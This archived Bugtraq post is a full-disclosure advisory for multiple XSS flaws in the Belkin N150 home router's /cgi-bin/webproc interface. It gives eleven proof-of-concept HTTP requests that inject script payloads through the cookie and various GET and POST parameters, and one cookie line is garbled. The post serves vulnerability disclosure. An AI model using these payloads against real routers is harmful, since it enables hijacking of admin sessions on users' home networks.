lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <56CDD90E.40103@gmail.com>
Date: Wed, 24 Feb 2016 21:53:42 +0530
From: Rahul Pratap Singh <techno.rps@...il.com>
To: bugtraq@...urityfocus.com
Subject: Belkin N150 Router Multiple XSS Vulnerability

## FULL DISCLOSURE
 
#Product : Belkin N150 Home Router
#Exploit Author : Rahul Pratap Singh
#Home page Link : http://www.belkin.com
#Linkedin : https://in.linkedin.com/in/rahulpratapsingh94
#Version : F9K1009 v1
#Firmware : 1.00.09
#Date : 24/Feb/2016

→ Vulnerability/BUG Report :

—————————————-
Description:
—————————————-
Belkin N150 Home router is vulnerable to XSS vulnerability. Numerous
parameters are not sanitized that leads to XSS.

—————————————-
Vulnerable Code:
—————————————-
https://0x62626262.files.wordpress.com/2016/02/belkinsessionxssvulcode.png
https://0x62626262.files.wordpress.com/2016/02/belkinxsspocvulcode.png
https://0x62626262.files.wordpress.com/2016/02/vul8.png

—————————————-
Exploit and Poc:
—————————————-
1)
GET /cgi-bin/webproc?getpage=html/top.html&var:page=deviceinfo HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer:
http://192.168.2.1/cgi-bin/webproc?getpage=html/index.html&var:page=deviceinfo
Cookie: sessionid="></a><img src=x onerror=alert(1)><a; auth=ok;
expires=Sun, 15-May-2102 01:45:46 GMT; language=en_us
Connection: keep-alive

https://0x62626262.files.wordpress.com/2016/02/belkinsessionxsspoc.png

2)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer:
http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 222

getpage=html%2Fpage.html&errorpage=< script>alert("xss")<
/script>&var%3Apage=deviceinfo&var%3A
errorpage=login&var%3Alogin=true&obj-action=auth&%3Ausername=admin&%3Apassword=eHNz&%3Ahostname=dGVjaG5v&%3A
action=login&%3Asessionid=3921960f

https://0x62626262.files.wordpress.com/2016/02/belkinxsspoc2.png

3)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer:
http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 238

getpage=html/page.html&errorpage=html/page.html&var:page="< /scRipt><
scRipt>prompt("xss")< /scRipt>< scRipt>&
var:errorpage=login&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&:
sessionid=3921960f

https://0x62626262.files.wordpress.com/2016/02/belkinxsspoc3.png
 
4)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer:
http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length:
245getpage=html/page.html&errorpage=html/page.html&var:page=deviceinfo&var:errorpage=
"< /scRipt>< scRipt>prompt("xss")< /scRipt><
scRipt>&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&:
sessionid=3921960f

https://0x62626262.files.wordpress.com/2016/02/belkinxsspoc4.png

5)
GET /cgi-bin/webproc?getpage=< scRipt>prompt("xss")<
/scRipt>&var:getpage=abc&var:language=en_us&var:page=login&var:oldpage
=ut_firmware HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46
GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

https://0x62626262.files.wordpress.com/2016/02/belkinxsspoc5.png

6)
GET /cgi-bin/webproc?getpage=html/page.html&var:menu="< /scRipt><
scRipt>prompt("xss")< /scRipt><
scRipt>&var:page=login&var:subpage=-&var:errorpage=- HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer:
http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage=-&var:errorpage=-
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46
GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

https://0x62626262.files.wordpress.com/2016/02/belkinxsspoc6.png

7)
GET
/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage="<
/scRipt>< scRipt>prompt("xss")< /scRipt>< scRipt>& var:errorpage=- HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer:
http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&
var:subpage=-&var:errorpage=-
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46
GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

https://0x62626262.files.wordpress.com/2016/02/belkinxsspoc7.png

8)
GET /cgi-bin/webproc?getpage=html/page.html&var:tbsversion="< /scRipt><
scRipt>prompt("xss")< /scRipt><
scRipt>&var:page=login&var:subpage=-&var:errorpage=- HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer:
http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage=-&var:errorpage=-
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46
GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

https://0x62626262.files.wordpress.com/2016/02/belkinxsspoc8.png

9)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer:
http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 262

getpage=html/page.html&errorpage=html/page.html&var:CacheLastData="<
/scRipt>< scRipt>prompt("xss")< /scRipt>< scRipt>&
var:page=abc&var:errorpage=login&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&:
sessionid=3921960f

https://0x62626262.files.wordpress.com/2016/02/belkinxsspoc9.png

10)
POST /cgi-bin/webproc HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer:
http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:page=login
Cookie: sessionid=392Multiple XSS Vulnerabilities1960f; auth=ok;
expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 262

getpage=html/page.html&errorpage=html/page.html&var:sys_UserLevel="<
/scRipt>< scRipt>prompt("xss")< /scRipt>< scRipt>&
var:page=abc&var:errorpage=login&var:login=true&obj-action=auth&:username=admin&:password=YWJj&:hostname=dGVjaG5v&:action=login&:
sessionid=3921960f

https://0x62626262.files.wordpress.com/2016/02/belkinxsspoc10.png

11)
GET /cgi-bin/webproc?getpage=html/page.html&var:style="< /scRipt><
scRipt>prompt("xss")< /scRipt><
scRipt>&var:page=login&var:subpage=-&var:errorpage=- HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Mobile; rv:45.0) Gecko/45.0 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip,deflate
DNT: 1
Referer:
http://192.168.2.1/cgi-bin/webproc?getpage=html/page.html&var:menu=status&var:page=login&var:subpage=-&var:errorpage=-
Cookie: sessionid=3921960f; auth=ok; expires=Sun, 15-May-2102 01:45:46
GMT; language=en_us; expires=Sun, 15-May-2102 01:45:46 GMT
Connection: keep-alive

https://0x62626262.files.wordpress.com/2016/02/belkinxsspoc11.png

Vulnerability Disclosure Timeline:
→ January 30, 2016    – Bug discovered, initial report to Belkin
Security Team
→ February 24, 2016  – No response from vendor
→ February 24, 2016  – Full Disclosure

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

Download attachment "0x9ACF7D5F.asc" of type "application/pgp-keys" (9748 bytes)

Download attachment "signature.asc" of type "application/pgp-signature" (837 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ